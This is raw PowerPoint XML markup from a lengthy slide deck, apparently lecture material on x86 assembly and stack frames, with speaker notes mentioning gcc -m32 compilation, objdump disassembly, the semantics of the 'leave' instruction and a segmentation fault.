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547" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId235"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId23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5" r:id="rId161"/>
    <p:sldId id="416" r:id="rId162"/>
    <p:sldId id="417" r:id="rId163"/>
    <p:sldId id="418" r:id="rId164"/>
    <p:sldId id="419" r:id="rId165"/>
    <p:sldId id="420" r:id="rId166"/>
    <p:sldId id="421" r:id="rId167"/>
    <p:sldId id="422" r:id="rId168"/>
    <p:sldId id="423" r:id="rId169"/>
    <p:sldId id="424" r:id="rId170"/>
    <p:sldId id="425" r:id="rId171"/>
    <p:sldId id="426" r:id="rId172"/>
    <p:sldId id="427" r:id="rId173"/>
    <p:sldId id="428" r:id="rId174"/>
    <p:sldId id="429" r:id="rId175"/>
    <p:sldId id="430" r:id="rId176"/>
    <p:sldId id="431" r:id="rId177"/>
    <p:sldId id="432" r:id="rId178"/>
    <p:sldId id="433" r:id="rId179"/>
    <p:sldId id="434" r:id="rId180"/>
    <p:sldId id="435" r:id="rId181"/>
    <p:sldId id="436" r:id="rId182"/>
    <p:sldId id="437" r:id="rId183"/>
    <p:sldId id="438" r:id="rId184"/>
    <p:sldId id="439" r:id="rId185"/>
    <p:sldId id="440" r:id="rId186"/>
    <p:sldId id="441" r:id="rId187"/>
    <p:sldId id="442" r:id="rId188"/>
    <p:sldId id="443" r:id="rId189"/>
    <p:sldId id="444" r:id="rId190"/>
    <p:sldId id="445" r:id="rId191"/>
    <p:sldId id="446" r:id="rId192"/>
    <p:sldId id="447" r:id="rId193"/>
    <p:sldId id="448" r:id="rId194"/>
    <p:sldId id="449" r:id="rId195"/>
    <p:sldId id="450" r:id="rId196"/>
    <p:sldId id="451" r:id="rId197"/>
    <p:sldId id="452" r:id="rId198"/>
    <p:sldId id="453" r:id="rId199"/>
    <p:sldId id="454" r:id="rId200"/>
    <p:sldId id="455" r:id="rId201"/>
    <p:sldId id="456" r:id="rId202"/>
    <p:sldId id="457" r:id="rId203"/>
    <p:sldId id="458" r:id="rId204"/>
    <p:sldId id="459" r:id="rId205"/>
    <p:sldId id="460" r:id="rId206"/>
    <p:sldId id="461" r:id="rId207"/>
    <p:sldId id="462" r:id="rId208"/>
    <p:sldId id="463" r:id="rId209"/>
    <p:sldId id="464" r:id="rId210"/>
    <p:sldId id="465" r:id="rId211"/>
    <p:sldId id="466" r:id="rId212"/>
    <p:sldId id="467" r:id="rId213"/>
    <p:sldId id="468" r:id="rId214"/>
    <p:sldId id="469" r:id="rId215"/>
    <p:sldId id="470" r:id="rId216"/>
    <p:sldId id="471" r:id="rId217"/>
    <p:sldId id="472" r:id="rId218"/>
    <p:sldId id="473" r:id="rId219"/>
    <p:sldId id="474" r:id="rId220"/>
    <p:sldId id="475" r:id="rId221"/>
    <p:sldId id="476" r:id="rId222"/>
    <p:sldId id="477" r:id="rId223"/>
    <p:sldId id="478" r:id="rId224"/>
    <p:sldId id="479" r:id="rId225"/>
    <p:sldId id="480" r:id="rId226"/>
    <p:sldId id="481" r:id="rId227"/>
    <p:sldId id="482" r:id="rId228"/>
    <p:sldId id="483" r:id="rId229"/>
    <p:sldId id="484" r:id="rId230"/>
    <p:sldId id="485" r:id="rId231"/>
    <p:sldId id="486" r:id="rId232"/>
    <p:sldId id="487" r:id="rId233"/>
    <p:sldId id="488" r:id="rId2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72">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="433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00" autoAdjust="0"/>
    <p:restoredTop sz="90225" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="166" d="100"/>
          <a:sy n="166" d="100"/>
        </p:scale>
        <p:origin x="192" y="712"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2472"/>
        <p:guide pos="4336"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="16" y="2004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9" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="-335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presProps" Target="presProp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viewProps" Target="viewProps.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39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.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240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.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slide" Target="slides/slide229.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handoutMaster" Target="handoutMasters/handoutMaster1.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notesMaster" Target="notesMasters/notesMaster1.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2F0151-EC07-934A-AE26-1DBB68DC41B8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/20/18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B47CE2-62FE-FC4C-963B-9645AF7FF934}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92597834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48267C-E060-7343-A0FE-934AF6E9F7DE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/20/18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32F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40598878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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="952597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63103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"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dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17687207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63103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"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dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16700692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45AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10547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48660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45AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10547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3550028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F2EAA3-B90B-3540-B74E-FE7D42A3FF5B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986114" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4573588" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="4113862"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1643935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A83A21-1A9A-594A-986F-08077ACB5965}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680962" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6809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2613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41A4070E-5EB9-564E-AA70-CD0932C2E1FA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13641904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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1601747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8D1A39-98F2-8A4C-B616-4A88B9D6E6CA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6993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01673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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="460049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985A03-163E-1E4C-8C68-36E8EC5C6F82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10280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09718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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161395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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17736221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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10299872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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1071736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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19734689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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17375798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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5839740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DC0C6E-92FD-E543-A864-B05FD6DAFA38}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704514" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7045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981684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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
          </a:p>
          <a:p>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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1466014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Segmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Fault!</a:t>
            </a:r>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163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159246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0481D4-4C3B-774A-9C43-56765108CB42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030146" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10301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075350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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
